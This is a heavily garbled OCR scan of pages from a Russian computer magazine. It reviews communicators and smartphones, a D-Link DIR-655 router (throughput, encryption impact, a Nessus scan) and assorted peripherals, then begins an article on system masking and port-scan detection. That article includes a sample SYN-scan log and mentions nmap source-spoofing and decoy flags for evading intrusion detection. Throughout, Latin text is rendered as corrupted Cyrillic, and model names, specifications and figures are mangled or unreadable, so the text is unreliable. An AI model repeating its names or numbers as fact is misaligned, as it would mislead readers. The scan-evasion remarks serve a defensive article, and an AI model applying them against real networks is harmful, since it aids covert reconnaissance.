и общения потелефону, не отвлекаясь отуправления авто. 
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Технические характеристики: 



ОС: М5 Ѵ/іпсІоѵ/з МоЬіІе 6.0 
П а мять РАМ : 128 Мб КАМ (доступно 47 Мб) 

Память чСМ: 256 Мб Ріазіі НОМ 

Экран: диагональ 2.8", разрешение 240x320 (65536 цветов) 




Технические характеристики: 

«теша ОцаШт тМйМда оо^оотШ $650 

ОС: М5 Жіпбоѵѵз МоЬіІе 6.0 

Па м ЯТЬ РАМ : 64 Мб НАМ (доступно 47 Мб) 

Память РОМ: 128 Мб Ріазіі РОМ 

Экран: диагональ 2. 8", разрешение 240x320 (2б0тыс. цветов) 



Коммуникации: 6Р5, ЕООЕ, Н5РРА, ѴѴі-Рі, 802.11 Ь/д, ВІиеіоо(И2.0 
іпиігМа : 0 ІШГШ8ІгаАШііт гятт тШаіціііІ^ц^аійи^ені!атйіі1)еі5іеййай 
Фотокамера: (3 млн. пике.), встроенная вспышка, режим макросъемки 
ІІИШЙІНМІІШІЬ з : Й1Ш^Ш Вп^вя ШШИВЯвю8ИЙ8 

Н полнительно: — 

іес : 190 1 

Размер: 59x112x19 мм 

•••••••••О 

Компания НТО одной из первых вышла на рыноксо своими коммуникатора- 
ми, и многие до сих пор считают ее лидером в этом сегменте. Новый девайс 
выполнен в форм-факторе слайдер, что позволило установить клавиатуру 
цѵѵегТу, лишь немного увеличив толщину устройства. Кроме того, в открытом 
состоянии панель с экраном способна откланяться от плоскости клавиатуры 
— это особенно приятно, когда набираешьтекст обеими руками. Далеко не 
все предложения способны работать с аппаратной клавиатурой (для обще- 
ния в ІСО приходилось пользоваться стилусом и экранной клавиатурой], но 
печатать текст или набирать письма вполне удобно. Кнопки подсвечивают- 
ся втемноте, что можно считать дополнительным плюсом. Система работает 
подуправлением известной ОС и на базе процессора Оиаісотт М5М 7200 
с частотой 400 МГц — не очень много, но для работы достаточно. По объему 
встроенной памяти девайс опережает всех конкурентов. Два глазка объек- 
тивов свидетельствуют о готовности аппарата к внедрению сетей третьего 
поколения. Стандартный дисплей с диагональю 2,8" имеет разрешение 
240x320 пикселей, так что все элементы управленияты сможешь рассмот- 
реть без проблем. Девайс поддерживает все распространенныетипы 
беспроводной связи. Любителям путешествий пригодится встроенный 6Р5 
модуль — софт и программы ты сможешьустановить самостоятельно. Очень 
хорошо, что все производители перешли на подключение по стандартному 
тіпіІІБВ кабелю, через который осуществляется синхронизация и зарядка 
съемного аккумулятора. Коммуникатор выглядит несколько массивным, 
но эргономика проработана неплохо. Что примечательно, втесте на время 
автономной работы девайс показал наименьший результат. Таким образом, 
именнотебе решать, насколько для тебя важна аппаратная клавиатура и 
устройство в виде слайдера, ведь механические поломки зачастую стано- 
вятся причиной преждевременной «смерти» оборудования. 



Коммуникации : ЕР6Е, Н5РРА, ѴѴі-Рі, 802.11 Ь/д, ВІиеІооІЬ 2.0 
Питание: ел? ЩгІ оп а кку мул ято ра 1 05О^Ач7^ЖИУ л ято р съемный 
Фотокамера: 1600x1200 (2 млн. пике.), встроенная вспышка, режим 
ЩакросъемЩ 

Слоты расширения: тісгоБО (ТгапзРІазЬ), тісгоБОНС 
Дополнительно: радио, видео-выход 

ВІ 

Размер: 100x58x13 мм 

••••••••ОО 

Компания, производящая технику от стиральных машин до ноутбуков, вы- 
шла на рынок коммуникаторов с новинкой І_С КБ 20. Стильный черный корпус 
сразу привлекает внимание. Внешний осмотр показал, что девайс оснащен 
двумя камерами: одна для съемки фотографий и видеороликов, а вторая для 
видеосвязи с собеседником, когда Н50РА связь станет доступна повсеме- 
стно. Стильный гаджет имеет небольшое количество кнопок, но управлять 
им довольно легко и удобно. Абсолютно ровная передняя панель является 
сенсорной и ввод номера можно осуществлять как стилусом, так и пальцем 
— только помни, что экран отлично сохраняет отпечатки пальцев. Отметим, 
что для синхронизации с компьютером стандартный тіпіІІБВ кабель не по- 
дойдет — компания І_6 продолжает гнуть свою линию и выпускает устрой- 
ства с собственными интерфейсными разъемами. Перейдем к аппаратной 
начинке. Поддержка сотовых сетей второго и третьего поколения гарантиру- 
ет актуальность устройства довольно продолжительное время. Кроме того, 
поддерживаются беспроводные сети ВІиеТооТЬ и ѴѴі-Рі. Если первая чаще 
используется для передачи небольших файлов или синхронизации с бес- 
проводной гарнитурой, то ѴѴі-Рі пригодится для серфинга в сети. Крометого, 
широкое покрытие беспроводной сети позволит снизить расходы на связь за 
счет использования ір-телефонии. Дисплей «обычной» диагонали отлича- 
ется от конкурентов только поддержкой большего количества цветов — 260 
тысяч. Встроенной памяти хватит для большинства задач, но устанавливать 
дополнительное ПО рекомендуется на флеш-карту (благо поддерживаются 
тісгоБО). В тестах на продолжительность автономной работы І_6 КБ 20 за- 
нял третье место, обогнав конкурента от НТО. В целом, перед нами стильное 
функциональное устройство, которое может огорчить хозяина только необ- 
ходимостью постоянно протирать корпус. 
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Технические характеристики: 

Поддержи ^вМіЬйМюи^иЫиШИмгі еШИЮЯІДвИЮМІІІІЙІИІЮІ^ЙИ 
2І100 

Дисплей! 

Внутренний: цветной дисплей с активной матрицей (800x352 пикселей), 
16 миллионов цветов 

Внешний: цветной дисплей с активной матрицей (240x320 пикселей), 16 
миллионов цветов 

Операционная система: БутЬіап, версия 9-2 

Мультимедиа: 3,2-мегапиксельная камера со вспышкой, РМ-радио, 
медиапроигрыватель, СР 5 

Память: 150 МБ встроено, поддержка карт памяти МісгоББ (до 2 ГБ) 
Поддержка сети : ѴѴі-Рі 802.11 Ь/д, ВІиеіооіГі 2.0, ІгБА 

ІШШ 16 І 

Размеры: 132x57x20 мм 

Вне конкурса у нас рассматривается смартфон от известного на весь мир 
производителя телефонов — Ыокіа. Трубка -раскладушка очень основатель- 
но лежит в руке, не в последнюю очередь благодаря солидному весу (больше 
200 грамм). В сложенном состоянии это практически обычныйтелефон с рас- 
ширенными, за счет ОС, возможностями. Управление достаточно удобное и 
привычное для всех пользователей сотовыхтелефонов. Многим понравится, 
что объем встроенной памяти порядка 150 Мб. Этого хватит для установки 
большинства программ. Работать с софтом на небольшом экране можно, но 
не очень удобно. Однако все меняется, кактолькоты раскроешь устройство 
— работающая программа тут же разворачивается на большом внутреннем 
дисплее. Надо отметить, что экран достаточно узкий: удобно работать стек- 
стом, но затруднительно просматривать графику или работать с большими 
кусками документа. Особенно приятно, что при переходе на большой экран 
производительность практически не падает — а ведь разрешение меняет- 
ся и процессору приходится просчитывать картинку большего размера. Об 
эргономике можно сказать только хвалебные слова: экран при раскрытии 
фиксируется в двух положениях, кнопки приятны на ощупь, а набирать текст 
сообщения — сплошное удовольствие. Огорчает лишь небольшой ход кно- 
пок и отсутствие при нажатии щелчков, привычных для тех, кто много рабо- 
таетза компьютером. Набор беспроводных средств связи полный, вплоть до 
наличия инфракрасного порта. Ты можешь синхронизировать девайс даже 
со старым ноутбуком и подключить тот к интернету. В пику владельцам обыч- 
ных телефонов надо упомянуть о 6Р5 модуле, который не даст потеряться, и 
возможности одновременнозапускатьнесколькоіаѵа-приложений (хотя при 
запуске двух приложений девайс начинал притормаживать). 





Вновь коммуникатор ОІобзЬ Х600 вырвался вперед за счет производитель- 
ного процессора и небольшого разрешения экрана 



Время работы, минМагк 




<оммуникатор Оіобзб Х600 опередил всех благодаря низкому 
энергопотреблению и высокой емкости батареи 




3500 4000 4500 5000 



Производительность при работе с большим экраном значительно 
снижается 



г ВЫВОДЫ 

Довольно интересно ходить по городу, нося в карманеустройство, произ- 
водительность которого может сравниться с компьютером начала 2000-х. 
Крометого, большое преимущество для девайсовтакоготипа — это на- 
личие 0Р5 модуля. Итак, начнем расставлять оценки и вручать награды. 



Приз «Лучшая покупка» по праву достается коммуникатору бІобзЬ Х800 
как наиболее функциональному и приятному в обращении. А «Выбор 
редакции» присуждается девайсу, в народе прозванному «титан» — НТО 
ТуТЫ II, за то, что совмещает в себе отличную эргономику, дружествен- 
ность к пользователю и высокую функциональность, пс 
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ИГОРЬ ФЕДЮКИН 



ОБЗОР РОУТЕРА 



1 

о 


иг 


4КБ 


ІК-655 



ШИФРОВАТЬ ИЛИ НЕТ? 



$160 




Основной недостаток беспроводных сетей кроется в том, что весь трафик «гу- 
ляет» в эфире. Фактически любой желающий может прослушивать, что проис- 
ходит в сети. Чтобы исключить вероятность появления незваных гостей и пре- 
пятствовать «сливанию» передаваемой информации, существуют различные 
алгоритмы шифрования трафика. Надо понимать, что их применение отъедает 
часть вычислительных ресурсов процессора. И если для домашнего компьюте- 
ра включение шифрования на адаптере не столь значительно, то тот же процесс 
может схомячить значительную часть производительности роутера. В сегод- 
няшней статье мы не только рассмотрим новый Огай 2.0 N роутер от Э-Ілпк, но и 
проверим влияние различных алгоритмов шифрования на производительность 
беспроводного соединения. 



г ВНЕШНИЙ ВИД И КОМПЛЕКТАЦИЯ 

Следует констатировать, что сейчас мы наблюдаем дизайн-гонку между 
производителями сетевого оборудования. Все чаще приходится видеть 
белоснежно-белые глянцевые корпуса, необычный внешний вид устройств 
и интересные инновации в оформлении. 

0-І_іпк йі Р-655 упакован в белый корпус. На лицевой стороне нахо- 
дятся светоиндикаторы питания, статуса устройства, активности сег- 
ментов І_АЫ и ѴѴАЫ, беспроводного сегмента, а также использования 
ѴѴСЫ профилей с подключаемой по 115В флэшки. Стыльной стороны 
находятся разъемы І_АЫ и ѴѴАІМ, порт БЕВ для активации ѴѴСЫ-профи- 
лей, кнопка сброса на заводские установки и разъем для подключения 
питания. Роутер оснащен тремя антеннами с коэффициентом усиления 
3 сІВі каждая. 



В АППАРАТНАЯ НАЧИНКА 

Маршрутизатор построен на базе процессора ІІЬісот БйеатЕпдіпе 5160. 
Встроенный коммутатор представляетсобой 5-портовый 10/100/1000 
Мбит/секчип Ѵйеэзе Ѵ5С7385. Беспроводная часть устройства основана на 
чипсете Аібегоз АР5416 и использует схему 3x3 с 3 приемопередающими 
трактами. 

В ФУНКЦИОНАЛЬНЫЕ ВОЗМОЖНОСТИ 

Продукт относится к топовой линейке устройств 0-І_іпк — это хорошо видно 
по обилию закладок в веб-интерфейсе. Традиционно присутствует мастер 
быстрой настройки, который облегчит работу неопытным пользователям. 
Итак, на ѴѴАЫ- интерфей се доступно использование статических настроек ІР 
(Зіаііс ІР), автополучение их с ОНСР (Оупатіс ІР), а также протоколы РРРоЕ, 
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Интерфейсы: ІхѴѴАЫ (Ш-45) 1 0/100/1 000 Мбит/сек, 4хЦѴЫ (РИ-45) 10/100/1000 
Мбит/сек 

Беспроводная точка доступа ѴѴІ-РІ: ІЕЕЕ 802.1 1 Ь/д + Б гай N (до 300 Мбит/сек| 
Безопасность: ѴѴЕР (до 1 28 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К (ТКІР/АЕ5), 
поддержка РАБІІІ5 

Функции роутера: ЫАТ/МАРТ, БупОМБ, БНСР, Біаііс Роиііпд, 0о5 Епдіпе 
Функции файрволла:5РІ,ІІРЕЕіИег, ІР/МАСЕІІіепАссевзСопігоІ 



т'еггит 







РРТР и І_2ТР. Ни каких трудностей с работой последних выявлено не было, за 
исключением того, что адрес ѴРІЧ-сервера (в случае с РРТР/І_2ТР) задается 
только в виде ІР-адреса. Характерная проблема с маршрутизацией двух 
соединений на ѴѴАЫ-интерфейсе (базовое, «смотрящее» в сеть провайдера 
и, собственно, интернетлинкчерез ѴРІЧ) не миновала данный роутер. При 
попытке задания статических маршрутов вручную — роутер не принимает их, 
равно каки не поддерживает получение маршрутов с ОНСР сервера. 
Настройки ѴѴі-Рі довольно стандартны, однако нельзя не отметить подде- 
ржкуускоренной настройки ѴѴР5 (ѴѴі-Рі Ргоіесіеб Зеіир]. Все, что требуется 
сделать в этом случае — либо ввести РІЫ-код на подключаемыхустройс- 
твах, либо нажать и удерживать некоторое время специальную кнопку (у 
О I Р-655 она находится на правом боку]. 

Богаты и настройки маршрутизации и фильтрации трафика. Безусловно, 
тут присутствует возможность трансляции портов ЫАРТ : по одному порту 
с возможностью задания разных внешних и внутренних номеров (Ѵігіиаі 
Бегѵег) и целыми диапозонами (Роіі Рогѵѵагсііпд). Закладка Арріісабопз 
Риіезтакже отвечаетза настройки ЫАРТ, однако стой разницей, что порты 
«пробрасываются» внутрьтолько в случае отправки определенного тра- 
фика в интернет. Это может быть полезно, например, для торрент и других 
реег-іо-реегутилит. Запустившись, программа отправляет запрос на 
сервер, роутер «ловит» эту активность и пробрасывает необходимые порты 
«внутрь». Трансляция работает толь ко тогда, когда в этом есть необходи- 
мость. 

Ограничение доступа в интернет может производиться по ІР или МАС- 
адресу локальной машины, а также ІІРІ_ или домену интернет-ресурса. 

Не хватает л ишь фильтрации по ключевому слову. Ограничение трафика 
извне может производиться по диапазону ІР-адресов. 

Стоит заметить, что роутер поддерживает протокол І6МР, необходимый 
для просмотра мульти кастовых ІРТѴ потоков. И примечательно, что 
функция ІОМР Ргоху корректно отрабатывается даже в случае наличия 
ѴРЫ-соединения. Также отметим функцию ОоЗ Епдіпе, которая позволяет 
автоматически определять «толщину» доступной полосы интернет линка и 
самостоятельно приоритезировать мультимедийный и игровой трафик. 

г МЕТОДИКАТЕСТИРОВАНИЯ 

Для тестирования проводного и беспроводного сегментов использовалась 
передача пакетов максимального и минимального размера. 



1 . При тестировании пропускной способности ѴѴАЫ -> І_АЫ одна из станций 
подключалась к одному из портов свитча (интерфейс БАМ), вторая кѴѴАЫ 
порту. Таким образом, мы получали пиковую пропускную способность 

для ѴѴАЫ интерфейса (ее можно называть скоростью ЫАТ). Измерялась 
скорость однонаправленной передачи (направления ѴѴАЫ -> І_АЫ и І_АЫ -> 
ѴѴАЫ] и в режиме полного дуплекса (РОХ). Также мы провели дополнитель- 
ный замер при отключении работающего поумолчанию 5РІ-файрвола. 

2 . Поскольку при активации интернет соединения по протоколу РРТР со- 
здается дополнительная нагрузка на центральный процессор роутера, мы 
измерили пропускную способность РРТР. Для этого за ѴѴАЫ интерфейсом 
маршрутизатора был поднят ѴРЫ сервер. Проверяласьтакже возможность 
установки ѴРЫ соединения в случае размещения ѴРЫ сервера вне сегмен- 
та нахождения нашего маршрутизатора. 

3. Для оценки скорости ѴѴі-Рі мы использовали РСМСІА адаптер О-Біпк 
ОѴѴА-645. Измерения проводились втипичной квартире из двухточекс 
разнымудалением от роутера. В первом случае удаление не превышало 1 
метра, и измерялась максимальная скорость передачи данных. Во втором 
случае ноутбуке ѴѴі-Рі адаптером находился отточки доступа на расстоя- 
нии 1 0 метров по диагонали за стеной. Чтобы оценить скоростные потери 
при активации шифрования, мы сделали несколько замеров с применени- 
ем различных алгоритмов шифрования. 

4 . В качестве дополнительного исследования была проведена проверка 
на уязвимость со стороны ѴѴАЫ интерфейса с помощью программного 
продукта ТепаЫе Ыеззиз. Сканирование проводилось в двух режимах: с 
включенным и выключенным файрволом. 

Н РЕЗУЛЬТАТЫ ТЕСТОВ 

Без преувеличения, О-Біпк О I Р-655 на сегодняшний день является одним 
из лидеров по производительности. И хотя гигабитностьѴѴАЫ -порта не 
раскрывается даже натреть, немногие роутеры до него показывали пропус- 
кную способность ЫАТ на уровне 250-260 Мбит/сек. Производительность 
РРТР-соединения также находится на высочайшем уровне. При передаче 
в обе стороны она составляет~1 05 Мбит/сек, а в каждом направлении 
по отдельности — 92-93 Мбит/сек. Казалось бы, где могут потребоваться 
такие скорости? При скачивании популярного файла с довольно извест- 
ного торренттрекера у автора текста скорость боѵѵпіоасі была на уровне 10 
Мбайт/сек. 
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Что касается производительности \М-П,тотутесть ряд нюансов. Во- 
первых, использование ключа ТКІР приводит ктому, что адаптер всегда 
соединяется на скорости 54 Мбит/сек. А при жесткой установке на роутере 
шифрования ѴѴРА2-Р5К — ксети вообще невозможно подключится. Таким 
образом, единственным оптимальным вариантом является шифрование 
ѴѴРА-Р5К с ключом АЕ5. Скоростные потери при этом составляют примерно 
1 5% (относительно режима без шифрования). 

Настройки ѴѴі-Рі та кжепредлагаютвыбрать ширину радиоканала (20 или40МГц). 
Мы протестировали скорость, меняя этотпараметр без использования шифро- 
вания. Как видно из графиков, разница хоть и не двукратная, но весьма 
существенная. При удалении на 10 метров скорость ѴѴі-Рі снижается, 
однако остается на весьма высоком уровне. Сканирование ТепаЫе ЫеззиБ не 
выявило изъянов в защите маршрутизатора. 



В ВЫВОДЫ 

Как показало тестирование, 0-І_іпк йі Р-655 — один из рекордсме- 
нов по производительности ѴѴАЫ-ІАМ маршрутизации и показыва- 
ет впечатляющие результаты по скорости ѴѴі-Рі. Большим плюсом 
является высокая скорость РРТР и корректная работа I О М Р Ргоху 
во всех режимах интерфейса ѴѴАЫ. Конечно, есть и недостатки. Это 
касается, в первую очередь, некорректной работы модуля ѴѴі-Рі с 
некоторыми алгоритмами шифрования. Еще один минус кроется 
в неправильной работе роутера со статическими маршрутами и 
невозможностью их получения с ОНСР-сервера. Однако продукт в 
любом случае заслуживает высокой оценки, а при определенной 
программной доработке может стать одним из лучших домашних 
интернет шлюзов, нс 



Пропускная способность №АЫ-интерфейса 
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На графике представлена пропускная способность в двух режимах: с ис- 
пользованием протокола РРТР и в режиме Біабс ІР (ЫАТ Опіу) 



Скорость ѴѴі-Рі с шифрованием и без 
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: шифрованием и без него: Как видно с ѴѴРА-Р5К шифрованием с ключом 
>Е5 скорость незначительно падает 



Скорость \Ѵі-Рі при разной ширине радиока- 
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При разной ширине радиоканала: Вдвое большая полоса радиочастот 
обеспечивает существенный приростскорости ѴѴі-Рі 



Скорость ѴѴі-Рі (минимальная длинна пакета) 




Скорость ѴѴі-Рі (максимальная длинна пакета) 
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Скорость ѴѴІ-РІ при передаче пакетов максимального размера 



ТЕ5Т_І.АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКОМУ ПРЕДСТА- 
ВИТЕЛЬСТВУ КОМПАНИИ В-ЫЫК 
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Собери свою мечту... 
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Тгапксепсі ІРТЗ 

Флешка — маленькая, 
тоненькая, беленькая и емкая 



$20 




Технические характеристики: 

Тип носителя: 115В РІазЬ 
Емкость: 2 Гб 

Размеры: 30,3x12,3x2,4 мм 

Вес: 2 г 

Гарантия: 12 месяцев 





1. Идея не нова, но до сих пор вызываетвосхищение. Носитель класса 
иВВ-йазЬ размером с фалангу мизинца и весом всего2 грамма — мечта 
любого техноманьяка. 

2 . Необязательно носить ее на шее, подражаятипичным сисадминам, 

— флешка настолько мала, что ее легко можно приспособить в качестве 
сережки, изящного брелока для ключей или просто положить в один из 
кармашков в кошельке. 

3. Благодаря дизайну и размерам она станет отличным подарком нетолько 
любителю ІТ-технологий, но и девушке, а небольшая цена тому только 
способствует. 



Технические характеристики: 

Тип устройства: ТВ-тюнер 

Интерфейс: РС1 

Чип: Рііііірг 5АА7131 Е/ОЗ /6 

Форматы записи: МРЕС -1 и МРЕ 6-2 РТ, РіѵХ, аудио МРЕС- 1 1.ауег2 (МРА), 
АисІіоСО, МРЗ СО и ОѴР, ѴСЭ, 5-ѴСй, ОѴО-ѴісІео 

Форматы воспроизведения: МРЕС -1 и МРЕС- 2 , ОіѵХ, аудио МРЕС- 1 1.ауег2 
ІМРА), АигііоСО, МРЗ, ѴСО, 5-ѴСО и ОѴО-Ѵісіео, .ІРО, ВМР, РИС и СІР 

■ 



0 

1. Столь скромные размеры могут повлечьза собой ряд проблем: устройст- 
во легко потерять или попросту сломать. 

2 . Обратной стороной миниатюризации являются также невысокие харак- 
теристики, касающиеся скорости чтения. 

3. Модель бывает двух типов: с объемом памяти 1 Гб или 2 Гб. Опять же 
дизайн девайса и стремление производителя максимальноуменьшить 
все, что можно, не позволяютему произвести более емкие носителитого же 
плана. 

4 . Кстати, о дизайне: отверстие для шнурка слишком маленькое — продеть 
удастся только ниточку; цвет — только белый. А что делать тем, ктопредпо- 
читаетяркие цвета? 

5 . В связи с отсутствием блокиратора можно ошибиться с установкой — во- 
ткнуть носитель в ІІ5В-портнетой стороной. 

Результаты тестирования: 

І_іпеаг«гіІе — 3,08 Мб/с 
Аѵегадеѵѵгке — 0,08 мс 
Ыпеаг геасі — 10,1 Мб/с 
Аѵегаде геасі ассе55 — 0,84 мс 



1. Чип РЫІірз 5АА7 131 Е/03/6, на котором построен тюнер, принадлежитк 
последней серии. Он поддерживаетаппаратное декодирование, прослу- 
шивание радиопередач в РМ-диапазоне, а также прием цифрового сигнала 
стандарта 0ѴВ-Т2. Высокая емкость пригодится при дальних путешествиях 
или длительной записи видео. 

2 . В ходе теста быстрая настройка позволила получить шестнадцать эфир- 
ных каналов, картинка на большинстве из которых оказалась практически 
идеального качества. 

3. Устройство успешно справляется с поиском и передачей цифрового 
сигнала. 

4 . В пакете ПО предусмотрена полезная утилита ТітеВЫІі:, осуществляю- 
щая отложенную записьтелепрограмм. 

0 

1. Притестировании обнаружились некоторые проблемы с синхронизаци- 
ей программного обеспечения и аппаратной части. 

2 . Пультуправления —типовой, без индивидуального дизайна. Всему 
виной стандартизация МісгозоИ 

3. Из-за отсутствия встроенного аппаратного декодировщика и графиче- 
ских наворотов операционной системы процессор загружается достаточно 
сильно. 
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Технические характеристики: 

Чип: КѴ670 

Количество транзисторов: 666 млн 
Частота чипа: 800 МГц 
Частота памяти: 2200 

Числоунифицированных процессоров: 320 
Память: 512 Мб ОйОРз 
Ширина шины памяти: 256 бит 
Поддерживаемая версия АРІ ОігесіХ: 10.1 
Интерфейс: РСІ-Ехрге55 2.0 
Техпроцесс: 55 нм 

0 

1. Это представитель последней серии видеокарт от компании АМй в 
видении инженеров М5І. Отличная производительность — главный козырь 
этого устройства. 

2. Имеется поддержка последней версии Оігес^Х 10.1 , а также интерфейса 
РСІ-Ехргезз версии 2.0. Помимо этого производительзаявляето коррект- 
ной работе с шейдерной моделью 4.1 . 

3. Полностью распределенная архитектура с 512-битной кольцевой шиной 
для чтения и записи памяти. 

4. Неплохой разгонный потенциал. 

0 

1. Присутствует поддержка технологии Сгозвбге. Однако в связи со слабой 
программной реализацией возможны проблемы приустановке. 

2. Слишком габаритная система охлаждения. Обладателям корпусов со 
скромными размерами лучше позаботиться о новом «доме» для комплек- 
тующих своего компьютера. Доступ к близлежащим разъемам, скорее 
всего, будет за крыт. 

3. Та же система охлаждения в режиме больших нагрузок слишком шумная. 

4. Напоследок стоит отметить слишком высокую стоимость. Не успевает 
выйти новая линейка, как производители анонсируют следующую — и опять 
по запредельной цене. 



$405 



$125 



Ьо^кесЬ 09 



Новая легенда в сфере игровых 



манипуляторов 



Технические характеристики: 

Ресурс кнопок: 8 млн нажатий 
Расчетный пробег: 250 км 
Формат данных: 16 бит на ось 
Частота опроса порта: до 1000 Гц 

Управление курсором: фирменная лазерная технология 
Мощность процессора: 6,4 мегапикселя в секунду 

Разрешение сканирования: до 3200 точек на дюйм 
Максимальная скорость: 1150-1650 мм/с 
Максимальное ускорение: 20д 
Динамический коэффициент трения: 0,09 
Статический коэффициенттрения: 0,14 

■ 

1. Мышь оснащается двумя сменными корпусами, которые отличаются 
материалом покрытия. Разница между ними заметна на тыловой части и на 
боковинах. 

2. Сзади сверху находится отсекдля сменных грузиков. 

Вес устройства без корпуса и грузового картриджа составил 90 г, корпуса ХІ_ 
— 30 г, Ргесівіоп — 25 г. 

3. Все клавиши настраиваются в соответствии с пожеланиями пользовате- 
ля. Крометого, можно назначить цвет светодиодного индикатора — один из 
1 80 предустановленных. 

4. Точность позиционирования курсора на очень высоком уровне благода- 
ря рядутехнологий, внедренных компанией І_оді{есб. 

5. Обеспечено безупречное скольжение мыши практически на любомтипе 
поверхности. 



М8І 

КХ3870-Т2Б512Е- 

ОС 

Долби ботов на более высоких 
разрешениях 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИЯМ МІЛ-ТІМЕОІА 
СЮВ 1ТД495) 788-91 1 1 р >АПЛПѴ.МРС.ВЩ р ЕВООРАТА (ТД495) 787- 
5900 р ѴѴѴШ.ЕКОООАТА.КЩ, А ТАКЖЕ РОССИЙСКИМ ПРЕДСТА- 
ВИТЕЛЬСТВАМ КОМПАНИЙ М5І И ЬООІТЕСН 



1. Недостаточное количество сменных корпусов. Те, что есть в комплекте, 
практически ничем друг от друга не отличаются. 

2 . Правая кнопка огибает колесико слишком сильно — при активном ис- 
пользовании его можно случайно задеть. 

3. Кабель 14513 несколько жестковат. Во время агрессивной игры это может 
мешать. 

4. Любителям беспроводныхтехнологий придется подождать — пока 
девайс существует только с кабелем 115В. 
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азные специалисты имеют свой взгляд на то, как защйтить свою систему и 



какие средства дл я этог о использовать. Но в одном они с ойдутся наверняка: 






если грамотно замаскироват ь систему, не дать взломщи ку ее проанализиро-| 

. — 

вать, то взломать ее Ьуд ет ой как сложно! 

РТ , — — 



□ современном мире информационной безопасности особое 
значение придается так называемому «маска ради нгу» 
системы. По определению, маска радин г является спосо- 
бом скрытия данных, или методом выдачи ложных данных 
взамен истинных. В контексте компьютерной тематики это может быть 
все что угодно, например действия, связанные с подменой баннеров 
сервисов. 

В СТАРЫЙ ДОБРЫЙ СКАН ПОРТОВ 

Классический портскан состоит из трех этапов: установление соединения 
сокета, посылка в сокет некоторого количества информации, прослушива- 
ние ответа. Такой метод часто называютТСР Соппесі. Эффективно? Да! Но 
что мешает администраторуустановить ложный ответсервиса? Да ничего! 
Некоторые из подобных приемов подмены были приведены в статье 
«Серверное подполье». Анализ баннеров, полученных в ответ на попытку 
подключения, называется «лотерейным исследованием». И несмотря на то, 
что он является наиболее распространенным методом сканирования и, как 
правило, даетхорошие результаты, в ходе использования нужно обязатель- 
но учитывать следующее: 

• баннер сервиса может быть легко заменен наложный путем незначитель- 
ных измерений в исходных кодах, а большинство серверных приложений 



распространяется именно по лицензии Ореп Боигсе (АрасЬе, 55Н, РНР); 

• ложные баннеры могутбыть сгенерированы так, чтобы сбить действия 
сканера, или сделатьтак, чтобы он принял их за ЬопеуроС 

Н БОРЕМСЯ СО СКАНОМ ПОРТОВ 

Теперь немного теории, а именно основ ТСР/ІР-стека. На этапе установле- 
ния ТСР-соединения на каждый пакет 5УЫ высылаются пакеты БУЫ+АСК, 
после чего обмен окончательно закрепляется АСК-флагом. Разработчики 
сканеров отлично представляют себе механизм установления соединения 
и используют его для поиска открытых портов. Такой подход называется 
ТСР-сканированием и используется в наиболее популярных разработках 
самых авторитетных кодеров. Процедура дает отличные результаты, но 
имеет один серьезный недостаток. Банальным перехватом параметра реег- 
пагпе на сервере можно засечь того, кто подключался к объекту сокета! 
Получается, что наши действия по изучению сервера могут быть легко 
обнаружены. 

Безусловно, существуют и более незаметныетехники сканирования 
портов. Например, БУМ-сканирование. Этот метод часто называют«полу- 
открытым» сканированием, поскольку при этом полноеТСР-соединение 
с портом сканируемой машины не устанавливается. Сканер посылает 
БУЫ-пакет, как бы намереваясь открыть настоящее соединение, и ожи- 
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Характерная особен ностьѴѴіпсіо\л/5- выдача алфавита на 
ІСМР Ведиезі: 



".і*г :Н'”'Рлг 
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айтРВІ режет ІСМР-запросы, атакже применяеттехнику проброса пор 
та, видимо, с целью защиты от разных атак на их ресурсы. Нотем не менее 
ы выявили скрытые ІР-адреса и предполагаемую операционную систеі 



му 




дает ответа. Наличие флагов 5УЫІАСК в ответе указывает на то, что порт 
удаленной машины открыт и прослушивается. Флаг Р5Т в ответе означает 
обратное. Но несмотря на то что прямого соединения не происходит, мы 
все равно передаем пакеты на удаленную машину, а значит, их можно 
отследить! Например, посредством прослушивания собственных сетевых 
интерфейсов на базе РАѴѴ- доступ а. 

Арг 1 18:36:01 666.66.666.66:1093 -> 111.11.11.49:21 ЗУЫ 
Арг 1 18:36:01 666.66.666.66:1094 -> 111.11.11.49:22 ЗУЫ 
Арг 1 18:36:01 666.66.666.66:1095 -> 111.11.11.49:23 ЗУЫ 
Арг 1 18:36:01 666.66.666.66:1096 -> 111.11.11.49:25 ЗУЫ 
Арг 1 18:36:01 666.66.666.66:1097 -> 111.11.11.49:42 ЗУЫ 

Тоже самое втой или иной мере относится и кдругим видам сканирования. 
Кроме волны запросов можно заметить последовательность пакетов, в 
каждом из которых порт назначения увеличивается на единицу. И даже 
несмотря на то, что в некоторых сканерах реализована техника рандо- 
мизации (подключение к портам происходит случайно), это все равно 
можно отследить. В известном сканере N МАР для усложнения вычис- 
ления источника сканирования существуют флаги -5 и -0 (бесоу) (+-Р0), 
позволяющие спуфить источник и добавлять туда несколько машин. Это 
не скрываетсканирования, но обманываетсистемы ЮЗ. Кстати говоря, 
зіеаііб-сканированием ЗУЫ-скан называется только потой причине, что 
не все системы журналирования пишутлогзапросов. И это отнюдь не оз- 
начает, что их невозможно отследить! По определению, РАѴѴ — это формат 
данных, не имеющих четкой спецификации. Действительно, нам все равно, 
какой потоктрафика мы будем анализировать, — при желании мы зададим 
его структуру самостоятельно. С учетом этого можно выделить несколько 
утилит, используемых для выявления сканирования портов. 

1 . Зсапіодб ( ѵѵѵѵѵѵ.орепѵѵаЦ.сот/зсапІоаб ) 

Одна из наиболее сбалансированных систем обнаружения сканирова- 
ния хоста от разработчика Орепѵѵаіі. Может взаимодействовать с рядом 
библиотек захвата (ІіЬпбіз, ІіЬрсар). Но обращаться кодной из нихтребуется 
не всегда, посколькутотже І_іпих имеетсвой гаѵѵзоскеі іпіеііасе, позволя- 
ющий прослушивать трафик самостоятельно. У Эсапіодб существует также 
портированная версия для ѴѴіпбоѵѵз. 

2. РЗАй ( ѵѵѵѵм.ітезбгпеаДпеі/ргоіесіз/рзаб ) 

Название говоритсамоза себя. Это набор утилит, написанных на С и Регі, 
предназначенных не только для журналирования сканирования, но и про- 
